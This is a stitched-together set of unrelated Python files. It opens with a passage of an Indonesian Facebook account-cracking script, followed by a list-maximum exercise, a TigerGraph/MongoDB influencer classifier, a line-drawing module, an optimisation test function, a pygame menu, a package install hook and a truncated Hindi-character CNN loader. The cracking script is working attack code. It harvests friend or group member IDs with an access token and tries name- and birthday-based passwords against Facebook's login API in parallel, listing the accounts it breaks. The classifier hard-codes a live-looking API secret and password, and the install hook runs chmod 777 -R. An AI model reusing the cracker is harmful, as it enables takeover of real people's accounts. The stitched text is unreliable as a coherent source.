jalan('\x1b[1;91m[+] [ jangan lupa buat Subscribe youtube Achmad404 anjing ] \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('reset')
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=9999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mID Berhasil Di Ambil \x1b[1;91m: \x1b[1;97m' + str(len(id))
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[+] \x1b[1;92m[ Loading ] \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print(y+pm)
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP] ' + user + ' | ' + pass4
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
#achmad
super()
|
'''
Last maximum

Find the largest value in the list and the index of the LAST element
holding that value, in a single pass over the list, without modifying
it and without using an auxiliary list. Print both values.
'''
num_list = list(map(int, input().split()))
max_val = num_list[0]
max_ind = 0
for i, n in enumerate(num_list):
    # '>=' (not '>') so ties still update the index, keeping the LAST maximum.
    if n >= max_val:
        max_val = n
        max_ind = i
print(max_val, max_ind)
|
from lib import weeks
from lib import tigergraphAPI
from lib import mongoAPI
import pandas as pd
import numpy as np
'''
Classificazione utenti Influenti e non e salvataggio su MongoDB distribuito
'''
def main():
    """Per week: pull activity metrics from TigerGraph, derive influence
    scores, label the top 5% of users as 'INFLUENTE', and persist the
    DataFrame to the MongoDB 'metriche' collection."""
    # MongoDB connection
    print("Connessione MongoDB...")
    mongo_conn = mongoAPI.get_connection("localhost", 27027)
    mongo_db = mongo_conn.get_db("dataman_project")
    mongo_coll = mongo_db.get_collection("metriche")
    print("Done")
    # TigerGraph connection
    print("Connessione Tigergraph...")
    # SECURITY(review): host, API secret, username and password are
    # hard-coded and committed to version control -- rotate these
    # credentials and load them from the environment/config instead.
    hostName = "https://dataman.i.tgcloud.io"
    graphName = "twitter"
    secret = "rc7os2t91a2u8cm3q4je9tchejr7u934"
    userName = "tigergraph"
    password = "datascience"
    tiger_conn = tigergraphAPI.get_connection(hostName, graphName, secret, userName, password)
    print("Done")
    dates = weeks.get_weeks_list()
    # For each week...
    for i in range(0, len(dates)):
        print(i, dates[i])
        # Read raw counts from the graph.
        n_tweet_tot = tiger_conn.get_n_tweets(dates[i])
        df_complete = tiger_conn.get_metrics(dates[i])
        df_complete.reset_index(inplace = True)
        df_complete.rename(columns = {"index" : "user_id"}, inplace = True)
        # Derive the metrics (lambda_ is a mid-range smoothing weight).
        lambda_ = 0.7
        df_complete["TS"] = (df_complete["OT1"] + df_complete["CT1"] + df_complete["RT1"]) / n_tweet_tot
        df_complete["SS"] = df_complete["OT1"] / (df_complete["OT1"] + df_complete["RT1"])
        df_complete["CS"] = df_complete["OT1"]/(df_complete["OT1"] + df_complete["CT1"]) + lambda_*(df_complete["CT1"] - df_complete["CT2"]) / (df_complete["CT1"] + 1)
        df_complete["RI"] = df_complete["RT2"]* np.log(df_complete["RT3"])
        df_complete["MI"] = df_complete["M3"] * np.log(df_complete["M4"]) - df_complete["M1"] * np.log(df_complete["M2"])
        # NaNs (e.g. from division by zero or log of zero) become 0.
        df_complete.fillna(0, inplace=True)
        # Weighted mean of the five derived metrics (equal weights for now).
        metrics = df_complete.columns[-5:]
        metrics_weights = [1, 1, 1, 1, 1]
        df_complete['media'] = (df_complete[metrics] * metrics_weights).sum(axis=1)/sum(metrics_weights)
        # Top 5% by mean score are classified as influential.
        df_complete['classe'] = 'NON_INFLUENTE'
        df_complete.loc[df_complete['media'] > df_complete['media'].quantile(.95),'classe'] = 'INFLUENTE'
        # Persist to MongoDB, tagging each row with the week index so the
        # DataFrame can be queried back per week later.
        df_complete["week"] = i
        print("Salvataggio in mongoDB nella collection metriche...")
        mongo_coll.save_df(df_complete)
        print("Salvataggio completato")
        del df_complete


if __name__ == "__main__":
    main()
from display import *
from matrix import *
import math
def add_circle(points, cx, cy, cz, r, step):
    """Append *step* edges approximating a circle of radius *r* centered
    at (cx, cy), drawn in the plane z = cz."""
    prev_x = cx + r
    prev_y = cy
    for i in range(step):
        theta = 2 * math.pi * (i + 1) / step
        next_x = cx + r * math.cos(theta)
        next_y = cy + r * math.sin(theta)
        add_edge(points, prev_x, prev_y, cz, next_x, next_y, cz)
        prev_x = next_x
        prev_y = next_y
def add_curve(points, x0, y0, x1, y1, x2, y2, x3, y3, step, curve_type):
    """Sample a cubic curve into *step* line segments appended to *points*.

    curve_type 0 selects one basis matrix (inputs treated as two endpoints
    plus two rate-of-change pairs); any other value selects the other basis
    (inputs treated as four control points). The per-axis cubic
    coefficients [a, b, c, d] end up in abcd.
    # NOTE(review): matrix_mult appears to transform abcd in place (its
    # return value is unused) -- confirm against the matrix module.
    """
    abcd = []
    if curve_type == 0:
        abcd = [[x0, x2, x1 - x0, x3 - x2], [y0, y2, y1 - y0, y3 - y2]]
        matrix_mult([[2, -3, 0, 1], [-2, 3, 0, 0], [1, -2, 1, 0], [1, -1, 0, 0]], abcd)
        # NOTE(review): debug dump left in -- remove once verified.
        print_matrix(abcd)
    else:
        abcd = [[x0, x1, x2, x3], [y0, y1, y2, y3]]
        matrix_mult([[-1, 3, -3, 1], [3, -6, 3, 0], [-3, 3, 0, 0], [1, 0, 0, 0]], abcd)
    cx0 = x0
    cy0 = y0
    for i in range(step):
        # Loop-invariant; guards against Python 2 integer division in i/step.
        step = float(step)
        # Horner-style evaluation of the cubic at t = i/step.
        # NOTE(review): t only reaches (step-1)/step, so the final point
        # (t = 1) is never drawn -- likely an off-by-one; confirm.
        cx1 = (i/step) * ((i/step) * (abcd[0][0] * (i/step) + abcd[0][1]) + abcd[0][2]) + abcd[0][3]
        cy1 = (i/step) * ((i/step) * (abcd[1][0] * (i/step) + abcd[1][1]) + abcd[1][2]) + abcd[1][3]
        add_edge(points, cx0, cy0, 0, cx1, cy1, 0)
        cx0 = cx1
        cy0 = cy1
def draw_lines(matrix, screen, color):
    """Draw every edge in the edge matrix (points are stored in pairs)."""
    if len(matrix) < 2:
        # Call form is valid in both Python 2 (parens group the single
        # argument) and Python 3, replacing the py2-only print statement.
        print("Need at least 2 points to draw a line")
    p = 0
    # Edges are consecutive point pairs, hence the step of 2.
    while p < len(matrix) - 1:
        draw_line(screen, matrix[p][0], matrix[p][1], matrix[p+1][0], matrix[p+1][1], color)
        p += 2
def add_edge(matrix, x0, y0, z0, x1, y1, z1):
    """Append an edge to the matrix as two consecutive endpoint rows."""
    for x, y, z in ((x0, y0, z0), (x1, y1, z1)):
        add_point(matrix, x, y, z)
def add_point(matrix, x, y, z=0):
    """Append the homogeneous point [x, y, z, 1] to the point matrix."""
    point = [x, y, z, 1]
    matrix.append(point)
def draw_line(screen, x0, y0, x1, y1, color):
    # Integer line rasterizer (Bresenham-style), split into cases by the
    # signs/relative magnitudes of dx and dy; each case plots pixel by pixel.
    dx = x1 - x0
    dy = y1 - y0
    # NOTE(review): endpoints are swapped when dx + dy < 0; a standard
    # octant reduction would usually test dx < 0 -- confirm this condition
    # gives the intended symmetry for all slopes.
    if dx + dy < 0:
        dx = 0 - dx
        dy = 0 - dy
        tmp = x0
        x0 = x1
        x1 = tmp
        tmp = y0
        y0 = y1
        y1 = tmp
    if dx == 0:
        # Vertical line: walk y upward.
        y = y0
        while y <= y1:
            plot(screen, color, x0, y)
            y = y + 1
    elif dy == 0:
        # Horizontal line: walk x rightward.
        x = x0
        while x <= x1:
            plot(screen, color, x, y0)
            x = x + 1
    elif dy < 0:
        # Negative slope, stepping x; error term d decides when to step y down.
        d = 0
        x = x0
        y = y0
        while x <= x1:
            plot(screen, color, x, y)
            if d > 0:
                y = y - 1
                d = d - dx
            x = x + 1
            d = d - dy
    elif dx < 0:
        # Negative slope, stepping y; error term decides when to step x left.
        d = 0
        x = x0
        y = y0
        while y <= y1:
            plot(screen, color, x, y)
            if d > 0:
                x = x - 1
                d = d - dy
            y = y + 1
            d = d - dx
    elif dx > dy:
        # Shallow positive slope: x is the driving axis.
        d = 0
        x = x0
        y = y0
        while x <= x1:
            plot(screen, color, x, y)
            if d > 0:
                y = y + 1
                d = d - dx
            x = x + 1
            d = d + dy
    else:
        # Steep positive slope: y is the driving axis.
        d = 0
        x = x0
        y = y0
        while y <= y1:
            plot(screen, color, x, y)
            if d > 0:
                x = x + 1
                d = d - dy
            y = y + 1
            d = d + dx
|
import random, sys, os, math, numpy
#Eggholder Function
def run(Arr):
    """Evaluate the Eggholder benchmark function at the point Arr = [x, y]."""
    x, y = Arr[0], Arr[1]
    left = -(y + 47) * numpy.sin(numpy.sqrt(numpy.fabs(x / 2 + y + 47)))
    right = x * numpy.sin(numpy.sqrt(numpy.fabs(x - y - 47)))
    return left - right
#print run(512,404.2319)
def check(Arr, T, Z=None):
    """Return 1 for T == 0; for T == 1 return a (Z[0], Z[1], 2) range array
    whose first row holds the search bounds [-512, 512] per dimension.

    Bug fix: the default Z=[0] was a shared mutable default argument;
    use None as the sentinel instead.
    """
    if Z is None:
        Z = [0]
    xmax = 512
    xmin = -512
    if T == 0:
        return 1
    elif T == 1:
        Range = numpy.zeros((Z[0], Z[1], 2))
        # Only the first row is initialised, matching the original behaviour.
        for i in range(len(Range[0])):
            Range[0][i][0] = xmin
            Range[0][i][1] = xmax
        return Range
|
from data.constants import *
from data.sprites import *
# Directory holding the menu images.
menu_sprites_dir = path.join(SPRITES_DIR, "menu/")
# Volume-slider state shared as module globals with Volume / update_volume_line.
length_line = 20
line_point = 200 // 100  # slider pixels moved per volume unit (see update_volume_line)
volume_size = 10
class MainImage1:
    """Menu artwork image, scaled to 175x250."""
    def __init__(self):
        raw = image.load(menu_sprites_dir + "main_image1.png")
        self.image = transform.scale(raw, (175, 250))
        anchor = (WIN_WIDTH // 2 - 75, WIN_HEIGHT // 2 - 110)
        self.rect = self.image.get_rect(center=anchor)
class MainImage2:
    """Menu artwork image, scaled to 150x225."""
    def __init__(self):
        raw = image.load(menu_sprites_dir + "main_image2.png")
        self.image = transform.scale(raw, (150, 225))
        anchor = (WIN_WIDTH // 2 + 75, WIN_HEIGHT // 2 - 80)
        self.rect = self.image.get_rect(center=anchor)
class Play(sprite.Sprite):
    """'Play' button sprite."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        self.image = image.load(menu_sprites_dir + "play.png")
        anchor = (WIN_WIDTH // 2, WIN_HEIGHT // 2 + 70)
        self.rect = self.image.get_rect(center=anchor)
class Settings(sprite.Sprite):
    """'Settings' button sprite."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        self.image = image.load(menu_sprites_dir + "settings.png")
        anchor = (WIN_WIDTH // 2, WIN_HEIGHT // 2 + 110)
        self.rect = self.image.get_rect(center=anchor)
class Exit(sprite.Sprite):
    """'Exit' button sprite."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        self.image = image.load(menu_sprites_dir + "exit.png")
        anchor = (WIN_WIDTH // 2, WIN_HEIGHT // 2 + 190)
        self.rect = self.image.get_rect(center=anchor)
class Back(sprite.Sprite):
    """'Back' button sprite (same position as Exit)."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        self.image = image.load(menu_sprites_dir + "back.png")
        anchor = (WIN_WIDTH // 2, WIN_HEIGHT // 2 + 190)
        self.rect = self.image.get_rect(center=anchor)
class Level1(sprite.Sprite):
    """'Level 1' button sprite."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        self.image = image.load(menu_sprites_dir + "level1.png")
        anchor = (WIN_WIDTH // 2, WIN_HEIGHT // 2 + 70)
        self.rect = self.image.get_rect(center=anchor)
class Level2(sprite.Sprite):
    """'Level 2' button sprite."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        self.image = image.load(menu_sprites_dir + "level2.png")
        anchor = (WIN_WIDTH // 2, WIN_HEIGHT // 2 + 110)
        self.rect = self.image.get_rect(center=anchor)
class Volume(sprite.Sprite):
    """Volume-slider widget; its geometry follows the module globals
    length_line / volume_size."""
    global length_line, volume_size

    def __init__(self):
        sprite.Sprite.__init__(self)
        # Full widget surface (slider bar + label).
        self.image = Surface((350, 30))
        height = self.image.get_height()
        self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 100))
        # Background bar of the slider.
        self.bg_volume_line = Surface((200, height))
        self.rect_bg_volume_line = self.bg_volume_line.get_rect()
        # Screen-space rect of the bar, used for mouse hit-testing.
        left = WIN_WIDTH // 2 - self.image.get_width() // 2
        top = WIN_HEIGHT // 2 + 100 - height // 2
        self.rect_sc_bg_volume_line = Rect((left, top,
                                            self.bg_volume_line.get_width(),
                                            self.bg_volume_line.get_height()))
        # Filled part of the bar; its width tracks the global length_line.
        self.volume_line = Surface((length_line, height))
        self.rect_volume_line = self.volume_line.get_rect()
        self.font = font.Font(None, 30)
        self.volume_text = self.font.render(str(volume_size) + " volume", 1, WHITE)
        self.rect_volume_text = self.volume_text.get_rect(center=(275, 16))
def update_volume_line(events):
    """Rebuild the volume widget and apply keyboard/mouse volume changes.

    Mutates the module globals length_line / volume_size; a fresh Volume
    sprite is constructed on every call so its surfaces reflect the globals.
    Returns the composed Volume sprite.
    """
    global length_line, volume_size, line_point
    volume = Volume()
    volume.image.set_colorkey(BLACK)
    volume.volume_line.fill(RED)
    volume.bg_volume_line.fill(WHITE)
    # Compose: red fill onto the white bar, then bar + label onto the widget.
    volume.bg_volume_line.blit(volume.volume_line, volume.rect_volume_line)
    volume.image.blit(volume.bg_volume_line, volume.rect_bg_volume_line)
    volume.image.blit(volume.volume_text, volume.rect_volume_text)
    pressed = key.get_pressed()
    if pressed[K_LEFT]:
        if length_line > 0:
            length_line -= line_point
            volume_size -= 1
    elif pressed[K_RIGHT]:
        if length_line < 177:
            length_line += line_point
            volume_size += 1
    for i in events:
        if i.type == MOUSEBUTTONDOWN:
            # Click inside the bar: jump the slider to the cursor position.
            if volume.rect_sc_bg_volume_line.collidepoint(i.pos[0], i.pos[1]):
                length_line = i.pos[0] - WIN_WIDTH // 2 + volume.image.get_width() // 2
                volume_size = length_line // line_point
    return volume
def draw_volume_line(screen, clock, events):
    """Render the volume slider onto *screen* and advance one frame."""
    widget = update_volume_line(events)
    screen.blit(widget.image, widget.rect)
    display.flip()
    clock.tick(FPS)
class MenuTime(sprite.Sprite):
    """Main-menu scene: scaled background plus its buttons and artwork."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        background = image.load(menu_sprites_dir + "menu.png")
        self.image = transform.scale(background, (WIN_WIDTH, WIN_HEIGHT))
        self.rect = self.image.get_rect()
        self.play = Play()
        self.settings = Settings()
        self.exit = Exit()
        self.mainImage1 = MainImage1()
        self.mainImage2 = MainImage2()
class MenuGameOver(sprite.Sprite):
    """Game-over menu background.

    Consistency fix: every sibling menu class exposes ``rect``; add it
    here too so this sprite can be blitted the same way.
    """
    def __init__(self):
        sprite.Sprite.__init__(self)
        self.image = transform.scale(image.load(menu_sprites_dir + "menu.png"), (WIN_WIDTH, WIN_HEIGHT))
        self.rect = self.image.get_rect()
def menu_update():
    """Compose the main-menu scene (artwork behind, buttons on top)."""
    scene = MenuTime()
    layers = (scene.mainImage2, scene.mainImage1, scene.play, scene.settings, scene.exit)
    for layer in layers:
        scene.image.blit(layer.image, layer.rect)
    return scene
def menu_draw(screen, clock):
    """Main-menu loop: draw the menu and dispatch button clicks.

    Returns the level number chosen via level_menu_draw (non-zero), or
    terminates the program on Exit/QUIT/Escape.
    """
    menu_alive = True
    while menu_alive:
        # NOTE(review): the whole scene (including image loads) is rebuilt
        # every frame — functional but heavy.
        menu = menu_update()
        screen.blit(menu.image, menu.rect)
        display.flip()
        clock.tick(FPS)
        for i in event.get():
            if i.type == QUIT or i.type == KEYDOWN and i.key == K_ESCAPE:
                exit()
            elif i.type == MOUSEBUTTONDOWN:
                if menu.play.rect.collidepoint(i.pos):
                    choice = level_menu_draw(screen, clock)
                    if choice != 0:
                        return choice
                if menu.settings.rect.collidepoint(i.pos):
                    settings_draw(screen, clock)
                if menu.exit.rect.collidepoint(i.pos):
                    exit()
class SettingsTime(sprite.Sprite):
    """Settings scene: scaled background, back button and artwork."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        background = image.load(menu_sprites_dir + "menu.png")
        self.image = transform.scale(background, (WIN_WIDTH, WIN_HEIGHT))
        self.rect = self.image.get_rect()
        self.back = Back()
        self.mainImage1 = MainImage1()
        self.mainImage2 = MainImage2()
def settings_update(clock, events):
    """Compose the settings scene: artwork, volume slider, back button."""
    scene = SettingsTime()
    scene.image.blit(scene.mainImage2.image, scene.mainImage2.rect)
    scene.image.blit(scene.mainImage1.image, scene.mainImage1.rect)
    draw_volume_line(scene.image, clock, events)
    scene.image.blit(scene.back.image, scene.back.rect)
    return scene
def settings_draw(screen, clock):
    """Settings loop: show the volume slider and apply it to the music.

    Exits on Escape, the Back button, or program termination on QUIT.
    """
    settings_alive = True
    while settings_alive:
        events = event.get()
        # volume_size is the module global mutated by update_volume_line.
        mixer.music.set_volume(volume_size / 100)
        settings = settings_update(clock, events)
        screen.blit(settings.image, settings.rect)
        display.flip()
        clock.tick(FPS)
        for i in events:
            if i.type == QUIT:
                exit()
            elif i.type == KEYDOWN and i.key == K_ESCAPE:
                settings_alive = False
            elif i.type == MOUSEBUTTONDOWN:
                if settings.back.rect.collidepoint(i.pos):
                    settings_alive = False
class LevelMenuTime(sprite.Sprite):
    """Level-selection scene: background, level buttons, back button, artwork."""
    def __init__(self):
        sprite.Sprite.__init__(self)
        background = image.load(menu_sprites_dir + "menu.png")
        self.image = transform.scale(background, (WIN_WIDTH, WIN_HEIGHT))
        self.rect = self.image.get_rect()
        self.level1 = Level1()
        self.level2 = Level2()
        self.back = Back()
        self.mainImage1 = MainImage1()
        self.mainImage2 = MainImage2()
def level_menu_update():
    """Compose the level-selection scene and return it."""
    scene = LevelMenuTime()
    layers = (scene.mainImage2, scene.mainImage1, scene.level1, scene.level2, scene.back)
    for layer in layers:
        scene.image.blit(layer.image, layer.rect)
    return scene
def level_menu_draw(screen, clock):
    """Level-selection loop.

    Returns 1 or 2 for the chosen level, 0 for Back/Escape; terminates
    the program on QUIT.
    """
    level_menu_alive = True
    while level_menu_alive:
        level_menu = level_menu_update()
        screen.blit(level_menu.image, level_menu.rect)
        display.flip()
        clock.tick(FPS)
        for i in event.get():
            if i.type == QUIT:
                exit()
            elif i.type == KEYDOWN and i.key == K_ESCAPE:
                return 0
            elif i.type == MOUSEBUTTONDOWN:
                if level_menu.level1.rect.collidepoint(i.pos):
                    return 1
                if level_menu.level2.rect.collidepoint(i.pos):
                    return 2
                if level_menu.back.rect.collidepoint(i.pos):
                    return 0
|
"""def floating(n) :
x = 1
for i in n :
x = x * i
print(x)
s = 0
m = 0
for i in n :
m = x/i
print(m)
s = s + m
print(s)
m = [1, 2, 3, 6]
floating(m) """
for i in range(1, 10) :
print(pow(i , 2))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright © 2007 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
import os
def postInstall(fromVersion, fromRelease, toVersion, toRelease):
    # Recursively make the bundled database directory world-read/write/execute.
    # NOTE(review): chmod 777 -R is maximally permissive — confirm this is
    # really required rather than ownership/group adjustment.
    os.system("chmod 777 -R /opt/TurquazLinux08Beta5/database")
|
import numpy as np
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import os
import cv2
import matplotlib.pyplot as plt
REBUILD_DATA = True  # set False to reuse a previously saved training_data.npy
class HindiAlphabets():
    """Loads the Devanagari character folders and builds (image, one-hot) pairs.

    Bug fixes:
    - The attribute SAW was assigned twice (motosaw then patalosaw), so the
      motosaw folder was silently dropped from LABELS; the second one is
      now PATALOSAW.
    - LABELS are 1-based but np.eye(36) is 0-indexed; indexing with the raw
      label crashed on label 36 and shifted every one-hot by one. The index
      is now LABELS[label] - 1.
    """
    IMG_SIZE = 50
    KA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_1_ka"
    KHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_2_kha"
    GA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_3_ga"
    GHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_4_gha"
    KNA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_5_kna"
    CHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_6_cha"
    CHHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_7_chha"
    JA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_8_ja"
    JHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_9_jha"
    YNA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_10_yna"
    TAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_11_taamatar"
    THAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_12_thaa"
    DAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_13_daa"
    DHAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_14_dhaa"
    ADNA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_15_adna"
    TA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_16_tabala"
    THA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_17_tha"
    DA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_18_da"
    DHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_19_dha"
    NA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_20_na"
    PA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_21_pa"
    PHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_22_pha"
    BA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_23_ba"
    BHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_24_bha"
    MA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_25_ma"
    YAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_26_yaw"
    RA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_27_ra"
    LA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_28_la"
    WAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_29_waw"
    SAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_30_motosaw"
    SHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_31_petchiryakha"
    PATALOSAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_32_patalosaw"
    HA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_33_ha"
    CHHYA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_34_chhya"
    TRA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_35_tra"
    GYA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_36_gya"
    # Folder path -> 1-based class label.
    LABELS = {KA:1,KHA:2,GA:3,GHA:4,KNA:5,CHA:6,CHHA:7,JA:8,JHA:9,YNA:10,TAA:11,THAA:12,DAA:13,DHAA:14,ADNA:15,TA:16,THA:17,DA:18,DHA:19,NA:20,PA:21,PHA:22,BA:23,BHA:24,MA:25,YAW:26,RA:27,LA:28,WAW:29,SAW:30,SHA:31,PATALOSAW:32,HA:33,CHHYA:34,TRA:35,GYA:36}
    training_data = []

    def make_training_data(self):
        """Read every class folder, resize to IMG_SIZE, shuffle, and save."""
        for label in self.LABELS:
            for f in tqdm( os.listdir(label)) :
                try:
                    path = os.path.join(label,f)
                    img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
                    img = cv2.resize(img,(self.IMG_SIZE,self.IMG_SIZE))
                    # Labels are 1-based; np.eye rows are 0-indexed.
                    self.training_data.append([np.array(img),np.eye(36)[self.LABELS[label]-1]])
                except Exception as e:
                    # Unreadable/corrupt image files are skipped.
                    pass
        np.random.shuffle(self.training_data)
        np.save("training_data.npy",self.training_data)
# Rebuild the dataset from the raw image folders when requested.
if REBUILD_DATA:
    alphabet = HindiAlphabets()
    alphabet.make_training_data()
# allow_pickle is required: entries are [image_array, one_hot] object pairs.
training_data = np.load("training_data.npy",allow_pickle=True)
plt.imshow(training_data[2][0],cmap = "gray")
plt.show()
class Net(nn.Module):
    """Three conv+pool stages followed by two fully connected layers (36 classes)."""

    def __init__(self):
        super().__init__()
        self.conv1 = nn.Conv2d(1, 32, 5)
        self.conv2 = nn.Conv2d(32, 64, 5)
